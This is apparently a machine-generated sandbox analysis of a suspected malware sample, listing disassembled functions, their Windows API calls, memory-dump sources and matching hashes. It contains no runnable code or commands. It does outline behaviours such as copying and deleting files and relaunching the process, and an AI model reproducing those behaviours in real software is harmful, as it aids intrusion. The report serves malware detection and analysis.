                                                                                    • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                                                    • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                                                                                    Function 02D11507 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D1151B
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D11522
                                                                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 02D1153E
                                                                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 02D1155C
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 02D11566
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3225020163-0
                                                                                    • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                                                    • Instruction ID: a893e90dad43f4577cb7dd9c2ac56e71d52aa8d239d3a19c4244d9ff0260fe31
                                                                                    • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                                                    • Instruction Fuzzy Hash: 4A01CDBDA40208BFDB14DFE4DC49FAEB7B9EB48705F108159FA0597280D6759A018F91
                                                                                    Function 004012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3466090806-0
                                                                                    • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                                                    • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                                                                                    • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                                                    • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                                                                                    Function 02D2C9A9 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __getptd.LIBCMT ref: 02D2C9B5
                                                                                      • Part of subcall function 02D2C206: __getptd_noexit.LIBCMT ref: 02D2C209
                                                                                      • Part of subcall function 02D2C206: __amsg_exit.LIBCMT ref: 02D2C216
                                                                                    • __getptd.LIBCMT ref: 02D2C9CC
                                                                                    • __amsg_exit.LIBCMT ref: 02D2C9DA
                                                                                    • __lock.LIBCMT ref: 02D2C9EA
                                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 02D2C9FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                    • String ID:
                                                                                    • API String ID: 938513278-0
                                                                                    • Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                                                    • Instruction ID: c12c1d6a1adac73d78cffcfb292747c051df9ecc1b1faf85bef4e991c56101a1
                                                                                    • Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                                                    • Instruction Fuzzy Hash: A9F096319547309BD720B7A8540271D33A1EF3076DF12810BD414B73D0DB645D48DFA9
                                                                                    Function 0041C742 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __getptd.LIBCMT ref: 0041C74E
                                                                                      • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                                                      • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                                                    • __getptd.LIBCMT ref: 0041C765
                                                                                    • __amsg_exit.LIBCMT ref: 0041C773
                                                                                    • __lock.LIBCMT ref: 0041C783
                                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                    • String ID:
                                                                                    • API String ID: 938513278-0
                                                                                    • Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                                                    • Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
                                                                                    • Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                                                    • Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E
                                                                                    Function 00410740 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 217COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • StrCmpCA.SHLWAPI(00000000,02E35D40), ref: 0041079A
                                                                                    • StrCmpCA.SHLWAPI(00000000,02E35D00), ref: 00410866
                                                                                    • StrCmpCA.SHLWAPI(00000000,02E35E10), ref: 0041099D
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy
                                                                                    • String ID: `_A
                                                                                    • API String ID: 3722407311-2339250863
                                                                                    • Opcode ID: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                                                                    • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                                                                                    • Opcode Fuzzy Hash: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                                                                    • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                                                                                    Function 00410765 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 197COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • StrCmpCA.SHLWAPI(00000000,02E35D40), ref: 0041079A
                                                                                    • StrCmpCA.SHLWAPI(00000000,02E35D00), ref: 00410866
                                                                                    • StrCmpCA.SHLWAPI(00000000,02E35E10), ref: 0041099D
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy
                                                                                    • String ID: `_A
                                                                                    • API String ID: 3722407311-2339250863
                                                                                    • Opcode ID: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                                                                    • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                                                                                    • Opcode Fuzzy Hash: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                                                                    • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                                                                                    Function 02D26897 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 02D268CA
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 02D2698D
                                                                                    • ExitProcess.KERNEL32 ref: 02D269BC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                    • String ID: <
                                                                                    • API String ID: 1148417306-4251816714
                                                                                    • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                                                                    • Instruction ID: eb9ac6147698b877368ae11da7b6e0a652d4af41beee0cb5ef31de3eecc35bb7
                                                                                    • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                                                                    • Instruction Fuzzy Hash: 9A3178B1800228ABDB14EF90CD94FDEB77AEF24304F405198E205A2290DF746F88CF69
                                                                                    Function 00416630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                                                                    • ExitProcess.KERNEL32 ref: 00416755
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                    • String ID: <
                                                                                    • API String ID: 1148417306-4251816714
                                                                                    • Opcode ID: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                                                                    • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                                                                                    • Opcode Fuzzy Hash: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                                                                    • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                                                                    Function 0041A920 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcatlstrcpy
                                                                                    • String ID: vI@$vI@
                                                                                    • API String ID: 3905823039-1245421781
                                                                                    • Opcode ID: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                                                                    • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                                                                                    • Opcode Fuzzy Hash: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                                                                    • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                                                                                    Function 00418D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                                                    • wsprintfW.USER32 ref: 00418D78
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocProcesswsprintf
                                                                                    • String ID: %hs
                                                                                    • API String ID: 659108358-2783943728
                                                                                    • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                                                                    • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                                                                                    • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                                                                    • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                                                                                    Function 02D1A4C7 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                      • Part of subcall function 02D28DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02D11660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02D28DED
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02D1A548
                                                                                    • lstrlen.KERNEL32(00000000,00000000), ref: 02D1A666
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D1A923
                                                                                      • Part of subcall function 02D2AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D2AA4D
                                                                                      • Part of subcall function 02D1A077: memcmp.MSVCRT(?,00421264,00000003), ref: 02D1A094
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 02D1A9AA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                                                    • String ID:
                                                                                    • API String ID: 257331557-0
                                                                                    • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                                                                    • Instruction ID: ad2c5ea3ad20f399b76d601978bea640066b5b1adc718264911a5d094dcf55d7
                                                                                    • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                                                                    • Instruction Fuzzy Hash: F3E1DD76910128EBCB09EBA4DD90DEEB33AEF64704F508159E116B2290EE346E4CCF71
                                                                                    Function 0040A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                      • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02E04F30,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                                                                    • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                      • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                                                    • String ID:
                                                                                    • API String ID: 257331557-0
                                                                                    • Opcode ID: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                                                                    • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                                                                                    • Opcode Fuzzy Hash: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                                                                    • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                                                                                    Function 02D1D667 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                      • Part of subcall function 02D28DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02D11660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02D28DED
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02D1D6E8
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D1D8FF
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D1D913
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 02D1D992
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                    • String ID:
                                                                                    • API String ID: 211194620-0
                                                                                    • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                                                                    • Instruction ID: 285a1fe4cd3e75a7d1e65ccb7741766cf6375bf8ead3e4fbfd8728fbc06a984e
                                                                                    • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                                                                    • Instruction Fuzzy Hash: C291DC76910128EBCB08EBA4DD94DEE733AEF64708F504169E106A6290EF346E4CCF71
                                                                                    Function 0040D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                      • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02E04F30,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                                                                    Memory Dump Source
